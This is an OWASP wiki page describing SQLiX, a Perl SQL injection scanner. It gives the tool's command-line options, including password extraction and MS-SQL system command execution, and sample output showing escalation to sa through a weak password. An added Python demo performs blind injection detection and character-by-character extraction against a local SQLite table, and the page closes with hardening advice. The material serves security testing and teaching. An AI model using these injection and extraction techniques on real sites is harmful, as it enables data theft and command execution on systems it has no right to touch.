Category:OWASP SQLiX Project

From OWASP
Revision as of 14:47, 28 August 2006 by Cedric.cochin (Talk | contribs)


Overview

SQLiX, written in Perl, can crawl a site, find SQL injection vectors, identify the back-end database and retrieve the results of function calls or UDFs (and even execute system commands on MS-SQL). Its approach differs from that of other SQL injection scanners: it finds both normal and blind SQL injection vectors without needing to reverse-engineer the original SQL statement, relying only on injected function calls.

Goals

TBD

Download

OWASP SQLiX v1.0 is available for download here.

Features

TBD

Command line usage

Usage: SQLiX.pl [options]

       -help                                   Show this help

Target specification:

       -url [URL]                              Scan a given URL.
                                                 Example: -url="http://target.com/index.php?id=1"
       --post_content [CONTENT]                Add a content to the current [URL] and change the HTTP method to POST
       -file [FILE_NAME]                       Scan a list of URI provided via a flat file.
                                                 Example: -file="./crawling"
       -crawl [ROOT_URL]                       Scan a web site from the given root URL.
                                                 Example: -crawl="http://target.com/"

Injection vectors:

       -referer                                Use HTTP referer as a potential injection vector.
       -agent                                  Use HTTP User agent as a potential injection vector.
       -cookie [COOKIE]                        Use the cookie as a potential injection vector.
                                                 Cookie value has to be specified and the injection area
                                                 tagged as "--INJECT_HERE--".
                                                 Example: -cookie="userID=--INJECT_HERE--"

Injection methods:

       -all                                    Use all the injection methods.
       -method_taggy                           Use MS-SQL "verbose" error messages method.
       -method_error                           Use conditional error messages injection method.
       -method_blind                           Use all blind injection methods.
       -method_blind_integer                   Use integer blind injection method.
       -method_blind_string                    Use string blind injection method.
       -method_blind_statement                 Use statement blind injection method.
       -method_blind_comment                   Use MySQL comment blind injection method.

Attack modules:

       -exploit                                Exploit the found injection to extract information.
                                                 by default the version of the database will be retrieved
       -function [function]                    Used with exploit to retrieve a given function value.
                                                 Example: -function="system_user"
                                                 Example: -function="(select password from user_table)"
       -union                                  Analyse target for potential UNION attack [MS-SQL only].

MS-SQL System command injection:

       -cmd [COMMAND]                          System command to be executed.
                                                 Example: -cmd="dir c:\\"
       -login [LOGIN]                          MS-SQL login to use if known.
       -password [PASSWORD]                    MS-SQL password to use if known.

Verbosity:

       -v=[n]                                  Verbose mode level
                                                 v=0 => no output, only results are displayed at the end
                                                 v=2 => realtime display, provide minimum result info
                                                 v=5 => debug view [all url,content and headers are displayed]

Output example: MS-SQL System command execution

$ perl SQLiX.pl -file crawling -all -v=2 -exploit -cmd="dir c:\\"

======================================================
                   -- SQLiX --
 © Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
 http://www.target.example.com/DocumentDescription-HR.asp?DocID=2
        [+] working on DocID
                [+] Method: MS-SQL error message
                        [FOUND] MS-SQL error message (implicite without quotes)
                        [FOUND] function [@@version]:
                                Microsoft SQL Server  2000 - 8.00.534 (Intel X86) 
                                       Nov 19 2001 13:23:50 
                                       Copyright (c) 1988-2000 Microsoft Corporation
                                       Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
                        [INFO] System command injector:
                        [INFO] Current database: HR
                        [INFO] We are not sysadmin for now
                        [INFO] Checking OpenRowSet availibility - please wait...
                                [INFO] Current user login: [HR]
                                [FOUND] OPENROWSET available - (login [sa] | password [sa])
                                [INFO] Privilege escalation - from [HR] to [sa]
                                
                                ===========================================================================

                                 Volume in drive C has no label.
                                 Volume Serial Number is 00BC-6F73
                                
                                 Directory of c:\
                                
                                11/21/2005  06:36p      <DIR>          403679d1f6ca54e5384256556434111d
                                07/14/2006  10:49a      <DIR>          Documents and Settings
                                07/22/2005  02:21p      <DIR>          honeypot
                                07/21/2005  04:38p      <DIR>          iDefense
                                03/08/2002  08:23a      <DIR>          Inetpub
                                07/14/2006  03:21p      <DIR>          Program Files
                                08/07/2006  04:11p                 622 tmp.txt
                                11/28/2005  06:06p      <DIR>          WINNT
                                               1 File(s)            622 bytes
                                               7 Dir(s)     183,328,768 bytes free
                                
                                 
                                ===========================================================================

                        [FOUND] MS-SQL error message
 
RESULTS:
The variable [DocID] from [ http://www.target.example.com/DocumentDescription-HR.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [TAG implicite without quotes - MSSQL].

Output example: MySQL, PostgreSQL function Injection

$ perl SQLiX.pl -file crawling -all -v=2 -exploit

======================================================
                   -- SQLiX --
 © Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
 http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2
        [+] working on DocID
                [+] Method: MS-SQL error message
                [+] Method: SQL error message
                        [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers"
                        [INFO] Error without quote
                        [INFO] Database identified: MySQL Server
                        [INFO] Current function: version()
                        [INFO] length: 19
                            4.1.20-community-nt
                        [FOUND] SQL error message
 http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2
        [+] working on DocID
                [+] Method: MS-SQL error message
                [+] Method: SQL error message
                        [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers"
                        [INFO] Error without quote
                        [INFO] Database identified: PostgreSQL Server
                        [INFO] Current function: version()
                        [INFO] length: 88
                            PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
                        [FOUND] SQL error message

RESULTS:
The variable [DocID] from [ http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [Error message (user) - MySQL].
The variable [DocID] from [ http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 ] ...
   ... is vulnerable to SQL Injection [Error message (') - PostgreSQL].
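The detection idea the Overview describes (no reverse engineering of the original statement, only injected expressions and function calls) together with the -method_blind_integer and -exploit -function options, as an added Python example. This is not SQLiX's own code (SQLiX is Perl and works over HTTP); it stands in for the target site with an in-memory SQLite table and two hypothetical request handlers, vulnerable_page and safe_page, and extracts sqlite_version() where SQLiX would target @@version or version() as in the output examples above. Table contents and handler names are assumptions for the demo.

```python
import sqlite3

# Constructed sample data (not from the page): an in-memory SQLite table standing in
# for the DocumentDescription back end that the output examples query by DocID.
CON = sqlite3.connect(":memory:", check_same_thread=False)
CON.execute("CREATE TABLE docs (DocID INTEGER PRIMARY KEY, title TEXT)")
CON.executemany("INSERT INTO docs VALUES (?, ?)",
                [(1, "Handbook"), (2, "Policy"), (3, "Payroll")])


def vulnerable_page(doc_id: str) -> str:
    """Hypothetical handler that concatenates DocID into the statement without quotes
    (the 'implicite without quotes' situation SQLiX reports in the MS-SQL example)."""
    try:
        row = CON.execute("SELECT title FROM docs WHERE DocID = " + doc_id).fetchone()
    except sqlite3.Error:
        return "Error"
    return f"Document: {row[0]}" if row else "Not found"


def safe_page(doc_id: str) -> str:
    """Same handler with the value bound as a parameter: arithmetic or AND clauses in
    the input never reach the SQL parser, so the probes below cannot tell anything."""
    try:
        row = CON.execute("SELECT title FROM docs WHERE DocID = ?",
                          (int(doc_id),)).fetchone()
    except (ValueError, sqlite3.Error):
        return "Error"
    return f"Document: {row[0]}" if row else "Not found"


def blind_integer_check(page, value: int) -> bool:
    """Integer blind method: the original query is never seen. Send an expression the
    database evaluates to the same value (N+1-1) and one it does not (N+1-0).
    Injection exists only if the true-equivalent probe reproduces the baseline page
    while the false-equivalent probe does not."""
    base = page(str(value))
    same = page(f"{value + 1}-1")
    other = page(f"{value + 1}-0")
    return base not in ("Error", "Not found") and same == base and other != base


def blind_extract(page, value: int, expr: str) -> str:
    """Blind extraction of a function result, the counterpart of -exploit -function:
    append 'AND (<condition>)' to the known-good value and use 'page equals baseline'
    as a boolean oracle. Length first, then a binary search per character."""
    base = page(str(value))

    def holds(cond: str) -> bool:
        return page(f"{value} AND ({cond})") == base

    length = 0
    while length < 512 and holds(f"length({expr}) > {length}"):
        length += 1
    out = []
    for i in range(1, length + 1):
        lo, hi = 0, 127            # ASCII is enough for version strings
        while lo < hi:
            mid = (lo + hi) // 2
            if holds(f"unicode(substr({expr}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def direct_value(expr: str) -> str:
    """Ground truth for the demo: the function result queried directly."""
    return str(CON.execute(f"SELECT {expr}").fetchone()[0])


if __name__ == "__main__":
    print("concatenating handler vulnerable:", blind_integer_check(vulnerable_page, 2))
    print("parameterised handler vulnerable:", blind_integer_check(safe_page, 2))
    print("sqlite_version() via blind oracle:", blind_extract(vulnerable_page, 2, "sqlite_version()"))
```

Run as-is, the concatenating handler is flagged and its database version is recovered one character at a time, while the parameterised handler yields nothing because the arithmetic never reaches the SQL parser. The same oracle idea drives SQLiX's blind modes; the error-message modes are faster because the error text returns the function result directly, as the @@version output above shows. Note also what the MS-SQL example relies on beyond the injection itself: the application login [HR] was not sysadmin, but OPENROWSET with a guessable sa password let the tool reach sysadmin and run a command. Disabling ad hoc distributed queries and xp_cmdshell, and not running with a weak sa password, closes that escalation path even if the injection remains.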

Future Development

Currently working on a module able to dump the database schema and the data of the vulnerable database.

PS: If you are a real Perl developer (not like me ;) ), feel free to provide code improvement or advice.

News

OWASP SQLiX Project Created! - 09:45, 28 August 2006 (EDT)

While the SQLiX Project has been under development for some time now, it has only recently been donated to OWASP.

The OWASP community would like to thank Cedric Cochin for the generous donation.

Project Contributor

The project is led by Cedric Cochin (cedric.cochin at gmail dot com)

Homepage

Project Sponsors

If you would like to help SQLiX project development, feel free to contact the project leader.
